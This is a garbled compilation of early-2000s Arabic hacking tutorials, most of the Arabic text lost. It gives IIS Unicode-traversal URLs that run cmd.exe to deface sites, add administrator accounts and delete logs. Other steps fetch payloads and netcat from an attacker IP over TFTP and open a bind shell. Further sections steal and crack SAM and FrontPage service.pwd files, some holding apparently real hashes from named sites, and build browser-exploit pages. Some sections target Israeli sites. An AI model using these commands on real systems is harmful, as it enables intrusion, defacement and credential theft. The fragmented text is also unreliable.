\:http://www.xxxx.com/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir +c
-:
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin


. ECHO

-:
\:http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c

-:

w3svc.exe

inetpub\scripts

?http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\w3svc.exe

w3svc.exe
-:

inetpub\scripts

\:http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c


inetpub\wwwroot\index.htm -:
http://www.xxxx.com/scripts/w3svc.exe?/c+echo+Hacked+By+sNiper_hEx+hExRay@Hotmail.co
m+>+c:\inetpub\wwwroot\index.htm


.
CMD
-:
CMD

?http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe

CMD -:
\:http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd1.exe?c+dir+c
Access Denied . Access Denied
Access Denied
-:
CMD CMD1
-1
Copy -:

?http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe

ssinc.dll -:
-2
test.shtml
o
wwwroot/hEx/test.shtml
o
>! <--"include file="AAAA[...]AA#--
o
A 2049 .
http://www.xxxx.com/test.shtml
o
.
o
. Access Denied
o
500
o
.
NC.exe
-3
Temp Temp
.

-4
.
root.exe sensepost.exe shell.exe w3svc.exe :
-5
c:\inetpub\scripts .
-1

. FTP
CMD Scripts Shell.exe
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe/

mspft.pll Echo open


-2
ftp.host.com . FTP
c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl/
Anonymous
-3
mspft.pll
shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl/
hExRay@Hotmail.Com
-4
mspft.pll
shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl/
User Anonymous mspft.pll
-5
shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl/

-6
shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl/

.g
shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.ppl/
FTP FTP Get index.htm
-8

shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl/
Quit
-9
shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl/
-10 FTP.exe?+"-s:c:winnt\mspft.ppl
mspft.ppl -:
Open FTP.host.com Anonymous hEx@Hotmail.ComUser Anonymous -

hEx@Hotmail.Com

Get index.html

Quit

"msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl/
.
) ( Microsoft Access L0phtCrack
-:
_.SAM \
\winnt\repair L0phtCrack
-:


PASSFILT.DLL -:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT.DLL

ASP
MySQL ) ( htr.+

-:
http://www.xxxx.com/default.asp+.htr


database.inc
.

. TFTP
-1 index.htm \:c
-2 TFTP .

c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm/

tftp.exe

""i-

1.1.1.1

GET

index.htm

\\inetpub\wwwroot

index.htm

.
Log System32 -:
c+del+c:/winnt/system32/logfiles/*.log/

" ) ( "

> <

..
..
:
------------- )( cmd cmd1
:
+C+copy+c:\winnt\system32
c:\winnt\system32\cmd1.exe .. Echo
) CMD1.exe ( !
..
IWAM_USER Guest
. IIS
Guest !! (:
(: *nix Microsoft
(: Administrator (:

..
(: ..
+ :
Sechole.exe .
Kill.exe
Tlist.exe
ncx99.exe
tftpd32.exe
.. (:

:
Sechole - 1 .. ) (
..
. (:
Tlist - 2 .. +
(:
Kill.exe -3 .
NCX99 -3 NC 99
TFTP32.exe -4 ..

(: :

..
ncx99.exe :
http://target/scripts/..../winnt/system32/cmd1.exe?/c+C:\ncx99.exe
.. 99
CMD = . Guest
.. TLIST .. PID
.. ..
PID ..
Kill .. KILL.exe PID : PID (:
! ..
Sechole .. ..
(: Sechole.exe .
IWAM_USER .. Administrators
. Access Denied
:
+C+Echo+Hacked+by+XDeMoNX
< C;\inetpub\wwwroot\index+
htm.
..

... (:
: IWAM_USER
: .. ! .
(: .. .
Administrator .
!! (: (:
:
net user Demon pass /add && net localgroup administrators Demon /add
Save as . add.bat
: Demon Pass
(: ..
add.bat ) (
(: .. (:
(:
) !(
.
..

netstat -an ..
(:
90% (: 139

(:
(:
.. (: .
.. . GUI

..
GEtAdmin Sechole2 .. WINvnc

" "

<>
< :>

:
( 1
TFTPD ( 2
( 3
=================================================
=================================================
( 1
http://www.devil2k.com/
(( ))
TFTPD ( 2
http://iisbughelp.4t.com/
( 3
( )
scripts]/..%c0%af../..%c0%af../..]/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+C
C:\
scripts]/..%c0%af../..%c0%af../..]/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+D
D:\
scripts]/..%c0%af../..%c0%af../..]/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+E
E:\

))
((
(1 msadc
msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+C
(2 _vti_bin
vti_bin/..%c0%af../..%c0%af../.._/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+C
IIS )) (( :
C:\Inetpub\wwwroot

D:\Inetpub\wwwroot

E:\Inetpub\wwwroot
C


msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Inetpub\wwwroot
)
( wwwroot
wwwroot

index.htm
)) ((
index.htm
index.asp
default.htm
default.asp
main.htm
main.asp
wwwroot index.htm


index.htm ss.htm
c+dir c+ren
)) Dos Command
Prompt
:

msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+ren+C:\Inetpub\wwwroot\index.ht
m+ss.htm
index.htm ss.htm
(:
A

!!!Hacked
index.htm
TFTP



TFTP )
(
\ C:
index.htm \C:
\ C:
C:\inetpub\wwwroot
)) (( TFTP

TFTP )) ((


:
tftp.exe -i XXX.XXX.XXX.XXX get index.htm
C:\inetpub\wwwroot\index.htm
)) XXX.XXX.XXX.XXX ((
index.htm
wwwroot



:
"tftp.exe+i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm
(:
TFTP index.htm
:
msadc/..%c1%9c../..%c1%9c../../
"%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm
)) (( (:
: EXE :

EXE hunter.exe
:
index.htm \ C:
:
msadc/..%c1%9c../..%c1%9c../../
"%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe

msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exe/

msadc/..%c1%9c../..%c1%9c../../
%c1%9c../winnt/system32/cmd.exe?/c+hunter.exe
*.log
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.log/s

tmp
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.tmp/s


)) ((
bat



)) (( system32
______________________________________________________________
__________________
:
tftp
)) (( system32
)) ((

IIS Secure IIS Eeye


)) (( %90
IIS
)) (( .

" " IIS


> <
>< DEMON :
-------- - :
-------- IIS ..
..
.
-------- - :
-------- IIS4.0 IIS5.0 )) 80
(( .
------------ - :
------------ CGI-Scanner -1 .. ) Whisker :
( www.wiretrip.net/rfp
-2 ) :
( http://www.activestate.com/
-3 ) ( .. IIS
#########################
#########################
#########################

###########
# Game Starts !#
###########
---------------
- : IIS Hack.exe
--------------- eEye nc.exe
.. 80
cmde.exe . Administrator
NC.exe IIS Hack.exe . http://www.technotronic.com/
..
nc.exe ) (Htdocs IIS
. wwwroot
: IISHack.exe
c:\>iishack.exe http://www.target.com/ 80 your_IP/ncx.exe
:
/c:\>nc http://www.target.com eGG SheLL
: IIS4.0 )) (( .
do you want me to explain what to do next, hey common you must be
kidding
....hehe...
-----------------: MDAC = RDS
---------------- ) %40 ..
..
SYSTEM ..
..
c:\>nc -nw -w 2 http://www.host.com/ 80 :
GET /msadc/msadcs.dll HTTP :
application/x_varg : )) (( ..
www.wiretrip.net/rfp :
(( mdac.pl - msadc2.pl )) v
c:\> mdac.pl -h host.com
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c
echo hacked by me hehe > :
C:\inetpub\wwwroot\index.htm
Hacker's Swiss knife Army
Nc.exe :
systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r%
nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
)) ((
80 . Administrator
--------------------------------------: Codebrws.asp & Showcode.asp
------------------------------------- ASP IIS

..
)) asp.
(( .
)) (( :
_.http://www.victim.com/msadc/samples...nt/repair/sam
.. Expand it & Crack it ) LC3.0
24 ( .
-------------- : Null.htw
----------- .. ..
.. ASP
http://www.victim.com/null.htw?CiWe...HiliteType=full :
. Default.asp
---------------------- : webhits.dll & .htw
--------------------- http://www.victim.com/blabla.htw :
format of the QUERY_STRING is invalid :
. %90
:
www.victim.com/xxxxxxxxx/xxxxxxxx/x...hilitetype=full
XXXXX/XXXXX/XXXX/XXX.htw , :
iissamples/issamples/oop/qfullhit.htw
iissamples/issamples/oop/qsumrhit.htw
isssamples/exair/search/qfullhit.htw
isssamples/exair/search/qsumrhit.htw
.. LC3
-----------------------------------------------]-: ASP Alternate Data Streams [::$DATA
----------------------------------------------- .. 1998 IIS3.0
.. IIS4.0
)) ((
Global.asa
http://www.victim.com/default.asp::
$DATA
------------------ : ASP dot bug
----------------- ..

.. 1997
:
http://www.victim.com/sample.asp.
. IIS3.0
------------------------------------ : ISM.DLL Buffer Truncation
----------------------------------- ..
..
..
ISM.dll )( 20%
. Space
:
http://www.victim.com/global.asa%20(...<=230)global.asa.htr
<=230 230 .. %20
.. IIS 4.0&5.0
,
ISM.dll ..
..
Reboot . Logout & Login
----------: htr.+
-------- . ASP
:
http://www.victim.com/global.asa+.htr
------------- : site.csc
----------- DNS DSN, UID and
.. PASS Database
http://www.victim.com/adsamples/config/site.csc :
.. .

" "UniCode
> <
><Dark Devil :
::
.



) .... (


)( Trust Me
::
:
====

Found On 15 May 2001 BY NSFOCUS
::
All running IIS 4 / IIS 5 web server
Windows 2k
Windows 2k SP1 + SP2
:: )
( IUSR_machinename account
cgi
) DeCode (

::
<=== http://iisserver/scripts/..%5c..%...md.exe?/c+dir+c
<==== /http://iisserver
* - /scripts/ )
( cgi
( executable directory
iis
:: iis executable directory
)
(
* <=== winnt/system32/cmd.exe cmd
) cmd ping
netstat .... traceroute (
* -
) (
argument
copy
argument /c

:: 2000 cmd ) (?/ cmd


,
::
Starts a new instance of the Windows 2000 command interpreter
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
    [[/S] [/C | /K] string]
/C Carries out the command specified by string and then terminates
/K Carries out the command specified by string but remains
/S Modifies the treatment of string after /C or /K (see below)
/Q Turns echo off
/D Disable execution of AutoRun commands from registry (see below)
::
Starts a new instance of the Windows 2000 command interpreter
2000 cmd
. arguments
arguments /c ::
Carries out the command specified by string and then terminates

:: argument
/k ::
Carries out the command specified by string but remains
)
ping (
argument /Q echo

arguments )
/c ( /k on off
cmd ) (
MCSE

arguments /c
.
, cmd.exe

::
cmd.exe?/c+Ping.exe+PRINT
). ( enjoy this ::
http://issserver/scripts/..%5c..%.../ping.exe+PRINT
* - +/c /c argument cmd.exe
cmd + /c
+
.
** )
( decode
simplified
::
%255c..%255c../ ..../


iis check
iis
check
iis check
check

( slash) /
::
computer logic HexaDecimal
Values values
/ hex value ::
%20 : (space)
hex values
, hex values

decode
( slash) /
::
hex value , %5c = /
/ value

iis value

hexadecimal values ::
%25 = %
%35 = 5
%63 = c
iis checker
/ .

simplify

::
%255c     : %25 = % , 5 = 5 , c = c     = %5c
%%35c     : % = % , %35 = 5 , c = c     = %5c
%%35%63   : % = % , %35 = 5 , %63 = c   = %5c
%25%35%63 : %25 = % , %35 = 5 , %63 = c = %5c
: %5c = /

iis %5c = / = %5c
. checker

::
http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s
+/s




) MCSE
( 2000
.WIN2000 RESOURCE KIT

" "
> : <
..


.....
******************
...

.....
2000 .
IIS :
*1 .
*2 .
*3 " ".
*4 .IIS
..
:
wwwroot Inetpub
IIS
http://127.0.0.1/

http://127.0.0.1/
.

" "
> <
>:

<De\/iL Ni9hT

= =-,,,
)),,,,((

=-

=-
.. =-
=-
=-




= =


)) ((

-1
)) ((

-2
http://www.name.8m.com/
FreeServerS
))....8m.s5

)) (( ))
((


))
((

=-

IE 5 IE 5.5

)) "
"((


,,,,
keykey2000


http://www.mikkotech.com/kk2000pro.exe

SN: K100-43-109-0-793218E876A4C9-29

godwill 5 ))5.5
((
http://www.thecorpz.org/activex/gwpackage.zip

=========================================



enter
Upx )) ((
Html

General options
enter exe file ))
((
enter html use default
page
HTA File Name Done
)) ((



http://www.thecorpz.org/html/activesploits.html
=================== ====================



)) ,,((
.

" "
> <
>:

<Linux Girl

) ( cookies
..
...
:
-1 .
-2 .
-3 .
-4 : .



.



.

IP .
Log Files .


.

.
" "
.
.


.
: ...

: :
setcookie :
:code
boolean setcookie ( string name [, string value [, int expire [, string path [, string domain [, int secure ]]]]] )

:
: name ...
.
: value ... ... ...
... : serialize
unserialize .
: expire ) 1 ( 1970
... :
<- : .
<- : .
<- : . :
:code
<?
setcookie('site','http://www.palhackerz.com/',time()+3600);
?>
time )
1 . (1970
:

:
:code
<?
setcookie('site','',time()-360000);
?>
:
-1 .
-2 .
:
setcookie .. :
:code
<html>
<body>
<?
setcookie('site','palhackerz.com',time()+20000);
echo " Alfjr.com : the best islamic forum";
?>
</body>
</html>

?< ... setcookie


:
:code
<? setcookie('site','palhackerz.com',time()+20000);
?>
<html>
<body>
<? echo " palhackerz.com : the best Hacking forum"; ?>
</body>
</html>


: ..

PHP ...
$_COOKIE Associative Arrays
.
:
:code
<?
echo $_COOKIE['site'];
?>
:
:code
palhackerz.com
:
..
-1 : user.php :
<- : . <- : -2 index.php . user.php
:
-1 : user.php
:code
<?
/*-----------------------
..Cookies-Based Background Selector

Created By : "Rasha" <rasha@h4palestine.com>
For : h4palestine.com
-------------------------*/

function display_form(){
?>
<html>
<body>
<!-- Color setting Form -->
<form name=color_select method="GET">
<INPUT type="hidden" name="do" value="set_color">
<!-- the cookie value is client-controlled, so it is escaped before being echoed into the attribute -->
<INPUT name="color" type="text" value="<? echo htmlspecialchars(get_color()); ?>">
<INPUT type="submit" value="">
</FORM>
<!-- Color Clearing Form -->
<form name=color_clear method="GET">
<INPUT type="hidden" name="do" value="clear_color">
<INPUT type="submit" value="">
</FORM>
</body>
</html>
<?
}

function set_color(){
global $_GET;
setcookie('color',$_GET['color'],time()+36000);
header('Location:index.php');
}

function get_color(){
global $_COOKIE;
if(isset($_COOKIE['color'])){
return $_COOKIE['color'];
}else{
return "#FFFFFF";
}
}

function clear_color(){
global $_GET;
setcookie('color',$_GET['color'],time()-36000);
header('Location:index.php');
}

// selection
// $do is read from the query string explicitly; the original relied on register_globals
$do = isset($_GET['do']) ? $_GET['do'] : '';

if ($do=='display_form'){
display_form();
}elseif ($do=="set_color"){
set_color();
}elseif ($do=="clear_color"){
clear_color();
}
?>
display_form . set_color . get_color .
clear_color . -2 : index.php
get_color user.php :
:code
<html>
<BODY bgcolor="<? include('user.php'); /* cookie value is client-controlled, so escape it */ echo htmlspecialchars(get_color()); ?>">
<h1>.....</h1>
<br>

<br>

<a href="user.php?do=display_form"> </a>


</body>
</html>

" God Will "


> <
> : <
:
** html .
** ). 34 (
** Godwill .
:

http://www.geocities.com/love2002_il/godwill16.zip
tlsecurity :
:
html Godwill
...

html ...

General Options ...

Done
...

Gen
...enter Output 3
...

http://www.tripod.lycos.co.uk/ ...
...
) ( zone Alarm ...
...
.

" "NOOP4
> <
>< .MoHfOx. :
god will .
.. godwill

noob 4.0
=======================================
=============================
-1

=================
======================
=============================
layout 2<<<<====:::
6
-2 Internet Explorer 5
-3 Internet Explorer5.5
4 5
-6

==================================================
===================
executable file 3 <<<<====:::
-7

-8
=======================================
=============================
-9 <<<<====:::

...

" "
><
><. ( T.O.L. ( DeXXa :
:
* .
* FrontPage Server Extensions .
* . Microsoft Office FrontPage
* . CHMOD
* . Telnet
* . HTTP
* . SQL
* Server Side Scripting
. Language




. Screen Capture
@ :
.
.
. FrontPage Server Extensions
. FrontPage Extension Server
. FrontPage Extension Server
. FrontPage
.
@
* . FrontPage Server Extensions
* .
* .
* .
@ :

PHP
CGI Perl SSL FTP . SQL
Webmasters Microsoft
Office FrontPage
Office
.
@ FrontPage Server Extensions
) : (
Server
.
:
private_/
vti_bin_/
vti_cnf_/
vti_log_/
vti_pvt_/
vti_txt_/
:
* _: vti_bin
:
) : _( vti_bin
/vti_adm_/..
/vti_aut_/..

.
:
shtml.exe/..
fpcount.exe/..
* _: vti_pvt
:
: service.pwd DES.
: service.grp . authors deptodoc.btr : doctodep.btr
.
htaccess.
)

( .
) : (
* _: private
. htaccess.
@ FrontPage Extension Server
FrontPage Extension Server . HTTP
FrontPage Request
FrontPage Extension Server
fpcount.exe
Extension Server
.
@ : FrontPage Extension Server
FrontPage

FTP
.
: FrontPage Extension Server
) : XP
(
* FrontPage . Office
* File . Open Web
* ) ( .
*

.
*

.
@ FrontPage :
:
* :
) : _ vti_inf.html
(
FrontPage . - _ vti_inf.html :

http://www.Victim.com/_vti_inf.html
FrontPage Configuration Information FrontPage Extension Server
.
:
. Source Code "FPVersion="Version Version .* _: vti_cnf
FrontPage . :http://www.Victim.com/_vti_cnf
. Source Code :vti_generator:Programe
Programe Microsoft FrontPage X . X
* :
FrontPage . . Source Code : <Head><Meta Name="GENERATOR" Content="Programe"></Head>
Programe Microsoft FrontPage X.0
. X
* : NetCraft
. NetCraft.net . http:// .
FrontPage mod_frontpage/X X
. FrontPage Extensions Server
* : Telnet

) :
(
Start Run . Telnet 80 :Microsoft Telnet> Open www.Victim.com 80
Request Method . Head) : ( HTTP
http://www.Victim.net ISP.net :
Head www.Victim.net HTTP/1.1
Host: ISP.net
Accept: */*
Connection: close
. Response Server .
FrontPage
mod_frontpage/X
X . FrontPage Extensions Server
@ :
_ vti_pvt :
) : PHP
(
* .
* PHP :
<?PHP
// $file is taken straight from the request (register_globals); this is the
// unchecked path the text discusses, so it is kept as the page describes it
$open = FOpen($file, "r");
$get = FGets($open, FileSize($file));
Echo $get;
FClose($open);
?>

PHP


file
:
http://www.Victim.com/uploded_file...../../etc/passwd
uploded_file
.

" "
> <
> :<
//
NT - Unix
-1 frontpage
:
netcraft http://www.netcraft.com/

mod_frontpage/x
)=x (
/_vti_inf.html
http://www.almodammer.com/ :

http://www.almodammer.com/_vti_inf.html
Enter

Frontpage Configuration Information


/_vti_cnf
:
http://www.almodammer.com/_vti_cnf

source

vti_generator:Programe

Programe
------------------------------------------------- -2 frontpage
frontpage

http://www.almodammer.com/
fontpage _vti_pvt

http://www.almodammer.com/_vti_pvt
:
=============
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
=============

username:passwd

service
user / password

operator:hi9LHn9wAMuKM
operator:
hi9LHn9wAMuKM:


=)=(Crack Jack
=)=(John The Ripper

John The Ripper
::
http://www.openwall.com/john


\c:
RUN
txt passwd

start
run

command
Enter
DoS
RUN

cd..

>\c:

cd john
Enter


>c:\john

cd RUN

>c:/john/RUN
John The Ripper

====
john -i:all passwd.txt
-------------------------
====
john -i:Alpha passwd.txt
---------------------------------
====
john -i:Digits passwd.txt
---------------------------------
====
john -single passwd.txt
--------------------------------
-------------------------------------------------------------------------------
john.pot

------------------------------------------------------------------------------- username password
!!
/
)(1
frontpage

file
open web

)(2
FTP
FTP
ws-ftp
pro ftp

...
DOS
======================================
google
http://www.google.com/

/_vti_pvt


http://www.altavista.com/

link:service.pwd
..
link:adminstrators
password.

" "
><
> :<
Random Hacking CGIScripts Random Hacking
spiders
altavista.com ) link:xxxx.cgi or pl (
help.cgi link:help.cgi
Ikonboard HTML
help.cgi http://www.example.com/cgi-
bin/help.cgi
?http://www.example.com/cgi-bin/help.cgi
helpon=../members/[member].cgi%00
] [member ][
Ikonboard
2.1.7
CGIScript url

Exploit
http://www.secure.f2s.com/eng_ver/bugs/
http://www.securiteam.com/

....

...
CGIScripts !!

(:
sites 12610 co.il 1104
sites org.il sites 70 ac.il .sites 78 gov.il
.sites 54 net.il .sites 29 muni.il sites 2009 com
.sites 137 net .org - 121 sites .edu - 4 sites israel.net - 84
.sites ........ .il - sites
http://iguide.co.il/sites/sites.htm

http://www.achla.co.il/
http://www.reshet.co.il/data/index.vs?dw=1
http://www.maven.co.il/
http://www.tapuz.co.il/
http://www.walla.co.il/
http://www.info.gov.il/find.pl
altavista.co.il


/w3-msql
proxy.isp.net.sa :8080 GET
GET http://www.com.il/cgi-bin/w3-msql/ HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: ar-sa
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)
Host: www.com.il
Proxy-Connection: Keep-Alive
http://www.com.il/cgi-bin/ cgi-bin/w3-msql/
WWWMSQL
cgi-bin/w3-msql

WWWMSQL
w3-msql Exploit w3-msql
http://www.securiteam.com/exploits/2WUQBRFS3A.html
Random Hacking
w3-msql
/vti_pvt_/
HTML *html.
The page cannot be displayed..
Forbddien .... not found....
.. .....
url c
perl Shell *.sh Batch
perl exploit.pl exploit
(:
(:
> perl
exploit.pl > log.htm
Exploit

) ( RedHat 6.2
.

" "
><
>< marwan911 :

.

:IIS ) . (
:apache .



http://www.netcraft.net



whitehouse.org
: http:// /
http://uptime.netcraft.com/up/graph....whitehouse.org

The site www.whitehouse.org is running Microsoft-IIS/5.0 on Windows 2000


IIS5.0
2000

IIS5.0 ) (
) 2000 (



IIS .
.



.

www.arank.com

The site www.arank.com is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a
mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3
FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux

apache 1.3.20 FrontPage/5.0.2.2510
Linux

.



_ vti_pvt _ private

service.pwd users.pwd authors.pwd


adminstators.pwd
) %70
(
goodyco:CalXS8USl4TGM
http://www.goody.com.sa/_vti_pvt/service.pwd
goodyco CalXS8USl4TGM
john the ripper
) (
john -i PASSWORD.FILE





telnet


c
================
http://neworder.box.sk/ ) ( IIS
apache
http://www.ussrback.com/ EXPLOITS
.. c perl
.

" "
> <
>:

.

( -1
( - ) IIS (
( - ) apachc (
( -2
( -3
( -4


IIS




.
apachc
.
.

" )>&<( "


> <
> : <
* : (:
* : D:
* : , .
* : , , !!
* : , (:
* : (:
:2 , .
:2 D:
NT & Unix
, FrontPage (:
:
Administrator.pwd
Administrators.pwd
Authors.pwd
Users.pwd
_vti_pvt
(: http://www.tradesystemlab.com/_vti_pvt/service.pwd :
service.pwd :
-FrontPage- #
tradesys:FpNTpIDWSk872
(:
:3 , S:
: , WS_FTP www
ftp ftp.ebnmasr.com : ,
(:
:4 :
tradesys:FpNTpIDWSk872 )(N
:4 !! , John The
, Ripper http://www.openwall.com/john :
:5 , ,
:5 !! , , (: : ,
, doc & run : , run :
: p:
command.com : , run
178

tradesys:FpNTpIDWSk872 : txt passwd


, run , john.exe command.com :
<< john -single passwd.txt
<< john -i:Digits passwd.txt
<< john -i:Alpha passwd.txt
<< john -i:all passwd.txt ) , ,
( D:
john.pot :
:6 , ,
:6 , ;( , .
(:
:7 , ) , (Y
:7 , tradesys:FpNTpIDWSk872 : tradesys :
) ( :
:8 , $:
:8 ,,, ;( , ,
) ( D:
(:
:9 , , (:

: , : spiders
, ,
, walla.co.il : ,
;( .
:10 , , !!
:10 , $:
, , ,(: (: (: service.pwd :
:11 , , (:
:11 , EXPLOITES
, , (: , EXPLOITES
. /http://www.ussrback.com :

179

" CgiScaner "


><
> : <

1.
2 .
3 .
4 .
.
..
http://mypage.ayna.com/vox99/cgiscan3.zip

180

"
"
> <
> :<
:::
,,,
,,



...

181

::

27374 . 1243


**

.


------------

+
........ ,,,,
182

...
http://mypage.ayna.com/a7lla1/superscan.zip


183

" Shadow Scan Security "


> <
> <
:





Shadow Scan Security


http://www.safety-lab.com/SSS.exe

http://www.e3sar.net/almodammer/ShadowSecurityScanner5.35.exe
:
========================================
SetUp

:

184

+++++++++++
[] ][1
[] ][2
========================================
*****& &*****

=)
Start


ShadowScanSecurity
(=
-1-

Scanner
-2-

185

=1 4 )
(
=2
=3 4

=4
=5
=6
=7
-3-

186

) (1 -2-
) (2
) (3
-4-

+1+
+2+
+ 3+
+4+
+ 5+ :-3-
+ 6+
+ 7+
-5-
Done

187

-6-
Start Scan
1 -5-

" "
> <
> : <

etc/shadow/

188


etc/shadow/
BSD
etc/master.passwd/
SGI ARIX
etc/shadow/
AIX
etc/security/shadow/
)) )) - )) 64 64
(( (( ((
etc/shadow/
)) MD5 ((
)) (( NT - XP - 2000
)) (( LanMan
winnt/system32/config/sam/
))
((
)) ((
_.winnt/repair/sam or sam/
)) - ((
WINNT
.Windows

" ) ( "
> <

189

:
..
..
..
Telnet ..
Telnet
Port )( )
(Daemon .
: )( )(
)( .. ) (Telnet
) (Daemon ..
.. ) ( ) ( .
Telnet ) ( ..
.
Daemon .
Telnet FTP Client
FileTransfer Protocol
.. 21

Telnet FTP Client
!! FTP
..

-1 Telnet ftp.zdnet.com 21

- Sources Code
220 l19-sj-zdnet.zdnet.com NcFTPd Server (licensed copy) ready.

Banner FTP Daemon zdnet


.
.
-2 Username .. Password
zdnet Anonymous :

- Sources Code

190

user anonymous


- Sources Code
331 Guest login ok, send your complete e-mail address as password.


- Sources Code
pass @zorro

Anonymous
.. ) ) @

- Sources Code
230-You are user #552 of 2000 simultaneous users allowed.
230-
230 Logged in anonymously.

.. ..
.
)
( .. !!
.

: )( IP
.
..
.
: PASV

191

- Sources Code
PASV

IP ) ( )(
..

- Sources Code
227 Entering Passive Mode (207,189,69,61,12,41)

..
) ( IP .. 207,189,69,61

12 * 256 + 41 = 3113
.. 3113
Telnet ftp.zdnet.com
.. 3113
..

( LIST (
- Sources Code
LIST


- Sources Code
125 Data connection already open; Transfer starting.
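Worked example, added here and not part of the original text: parsing the 227 reply shown above into host and data port (p1 * 256 + p2), plus the check a client should make that the advertised host is the server it is already talking to, since a reply naming a third-party address would send the data connection elsewhere (the concern RFC 2577 raises for passive mode). The function names and sample replies are constructed.

```python
import re
from dataclasses import dataclass

# Constructed sample replies; the first mirrors the reply quoted in the text.
PASV_REPLY = "227 Entering Passive Mode (207,189,69,61,12,41)"
SPOOFED_REPLY = "227 Entering Passive Mode (10,0,0,5,0,80)"

# RFC 959 form: "227 ... (h1,h2,h3,h4,p1,p2)"
_PASV_RE = re.compile(
    r"^227\b.*?\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)"
)


@dataclass(frozen=True)
class PasvEndpoint:
    host: str
    port: int


def parse_pasv(reply: str) -> PasvEndpoint:
    """Parse a 227 reply; the data port is p1 * 256 + p2, so (12,41) -> 3113."""
    m = _PASV_RE.match(reply.strip())
    if not m:
        raise ValueError(f"not a 227 PASV reply: {reply!r}")
    fields = [int(x) for x in m.groups()]
    if any(f > 255 for f in fields):
        raise ValueError("PASV field out of range (each must be 0..255)")
    host = ".".join(str(f) for f in fields[:4])
    port = fields[4] * 256 + fields[5]
    if port == 0:
        raise ValueError("PASV reply advertises port 0")
    return PasvEndpoint(host, port)


def safe_pasv_target(reply: str, control_host: str) -> PasvEndpoint:
    """Return the data endpoint, refusing a host that differs from the control connection.

    A hardened client never connects to a third-party address named in a 227
    reply; here a mismatch is reported as an error instead of being followed.
    """
    ep = parse_pasv(reply)
    if ep.host != control_host:
        raise ValueError(f"PASV host {ep.host} differs from control host {control_host}")
    return ep
```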

192


.

.. PASV .

..
) ( .


.. CuteFTP!!

http://www.vbip.com/winsock/winsock_ftp_01.asp
) (
) http://www.vbip.com/winsock/winsock_ftp_ref_01.htm (
) http://www.cis.ohio-state.edu/htbin/rfc/rfc0959.html
(.

" ) ( "
> <
> :<

193

:
~~~~~~~~~
. password file password file ) (encryption ) (shadowed -

-:
~~~~~~~~~
!
) ( Void Eye

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
nmap
www.inscure.org/nmap
SuperScan
Perl Perl
C
( /http://www.7lem.com
ping (
) (587 - 514 - 513 - 143 - 110 - 37 - 25 - 23 - 22 - 21
...


23 /http://www.7lem.com

/telnet http://www.7lem.com

194

Windows Linux SunOS FreeBSD QNX


Linux ...
Linux
---------------------SunOS 5.7
---------------------- login :
SunOS 5.7
) (


nc http://www.7lem.com/ 80
